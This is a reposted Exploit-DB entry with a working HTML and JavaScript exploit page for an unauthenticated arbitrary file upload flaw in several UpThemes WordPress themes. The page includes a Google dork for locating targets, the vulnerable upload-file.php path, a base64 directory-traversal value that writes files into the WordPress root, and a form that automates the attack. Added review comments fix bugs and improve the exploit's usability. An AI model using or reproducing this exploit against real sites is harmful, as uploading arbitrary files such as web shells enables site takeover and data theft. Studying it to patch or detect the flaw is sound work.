Multiple WordPress UpThemes Themes – Arbitrary File Upload

  • 作者: Divya
    日期: 2015-04-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36611/
  • # Exploit Title: WordPress SimpleCart Theme File Upload and Execution
    # Google Dork: inurl:/wp-content/themes/simplecart
    # Date: 31 March 2015
    # Exploit Author: Divya
    # Vendor Homepage: https://github.com/UpThemes/
    # Software Link: https://github.com/UpThemes/SimpleCart-Theme
    # Version: 2.1.2
    # Tested on: Windows, Linux
    # CVE : None
    #
    # Other Themes (listed as affected; the form below defaults to the SimpleCart path, so set its
    # "Vulnerable File" field to the matching theme directory — the exact script path per theme is not
    # given here, confirm against each theme's source):
    # Micro Theme 1.0.3: https://github.com/UpThemes/Micro-Theme
    # Holding Pattern Theme 1.3: https://github.com/UpThemes/Holding-Pattern-Theme
    # Gallery Pro Theme 2.5.3: https://github.com/UpThemes/Gallery-Pro-Theme/
    # Evo Theme 1.3: https://github.com/UpThemes/Evo-Theme
    # Charity Theme 1.1.3: https://github.com/UpThemes/Charity-Theme/
    
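    <!doctype html>
    <html lang="en">
    <head>
    <meta charset="utf-8">
    <title>WP Theme Exploit</title>
    <!--
      NOTE(review): crypto-js is fetched from Google Code over plain HTTP with no
      Subresource Integrity hash, so whatever an on-path party serves here runs in
      the operator's browser; Google Code hosting is also long gone, so these URLs
      are unlikely to resolve. Host md5.js locally (or pin an https copy with an
      `integrity` attribute) before using this page. enc-base64 is loaded but never
      referenced by the script below — the base64 values are typed in by hand.
    -->
    <script src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/rollups/md5.js"></script>
    <script src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/components/enc-base64-min.js"></script>
    <script>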
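    /**
     * Points the exploit form at the target's vulnerable upload script.
     *
     * Reads the target host, the scheme radio and the vulnerable-file path from
     * the form, sets the form action to "<scheme><host><path>", and renames the
     * file input to the hex MD5 of the host string. The rename mirrors what the
     * upload handler evidently expects (see the commented-out fixed name on the
     * file input in the markup). Which exact host string the server hashes is
     * not visible here, so the value typed in "Target IP" must match it byte for
     * byte (including any port) — TODO confirm against upload-file.php.
     *
     * Returns true when the form may be submitted and false when no target was
     * entered. The return value only cancels submission when this is wired as the
     * form's onsubmit handler; an onClick on the submit button ignores it.
     */
    function process_data()
    {
    	var hostField = document.getElementById('targetip');
    	// Stray whitespace would corrupt both the URL and the hashed field name.
    	var target = (hostField.value || '').trim();
    	if (target === '')
    	{
    		return false;
    	}
    	// The two radios share name="rb1"; only the checked one carries the scheme.
    	// Looking them up by id would always return the first (HTTP) radio, so
    	// HTTPS could never be selected.
    	var schemeRadio = document.querySelector('input[name="rb1"]:checked');
    	var scheme = schemeRadio ? schemeRadio.value : 'http://';
    	var vulnPath = document.getElementById('vfile').value;
    	document.getElementById('myform').setAttribute('action', scheme + target + vulnPath);
    	// CryptoJS.MD5 returns a WordArray; String() yields its lowercase hex form.
    	document.getElementById('file1').setAttribute('name', String(CryptoJS.MD5(target)));
    	return true;
    }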
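    </script>
    </head>
    <body>
    <!--
      Builds a multipart POST to <scheme><target><vulnerable file>. process_data()
      fills in the form action and renames the file input immediately before
      submission; no WordPress cookie or nonce is sent, so the endpoint is
      evidently reachable without authentication — confirm against the theme.
    -->
    <form id="myform" name="myform" action="#" method="post" enctype="multipart/form-data" onsubmit="return process_data()">
    	<label for="targetip">Target IP or hostname</label>
    	<input type="text" id="targetip" name="targetip" required>
    	<fieldset>
    	<legend>Scheme</legend>
    	<!-- Both radios share name="rb1"; the checked one's value is the scheme.
    	     Each has its own id so labels and lookups are unambiguous. -->
    	<input type="radio" id="rb1" name="rb1" value="http://" checked><label for="rb1">HTTP</label>
    	<input type="radio" id="rb2" name="rb1" value="https://"><label for="rb2">HTTPS</label>
    	</fieldset>
    	<label for="file1">Upload File</label>
    	<!-- The field name is replaced at submit time by the MD5 of the target
    	     string (e.g. "00958fd0af98291fdf517e3fe763da5c"); the upload handler
    	     appears to look for the file under that hashed name, so the target
    	     string must match what the server hashes — confirm in upload-file.php. -->
    	<input type="file" id="file1" name="n1"><br>
    	<label for="upload_path">Upload Path (base64)</label>
    	<input type="text" id="upload_path" name="upload_path" value="Li4vLi4vLi4vLi4v"><br><br>
    	<fieldset>
    	<legend>Base64 Encoded value (without double quotes)</legend>
    	<!-- Directory traversal relative to .../themes/simplecart/admin/; the
    	     server evidently base64-decodes this field before using it as a path. -->
    	1. "Li4vLi4vLi4vLi4v" (decodes to "../../../../") writes into the WordPress root directory.<br>
    	2. "Lg==" (decodes to ".") writes into the upload script's own directory.<br>
    	</fieldset><br>
    	<label for="vfile">Vulnerable File</label>
    	<input type="text" id="vfile" name="vfile" value="/wp-content/themes/simplecart/admin/upload-file.php" size="100"><br><br>
    	<button type="submit">Exploit</button>
    </form>
    </body>
    </html>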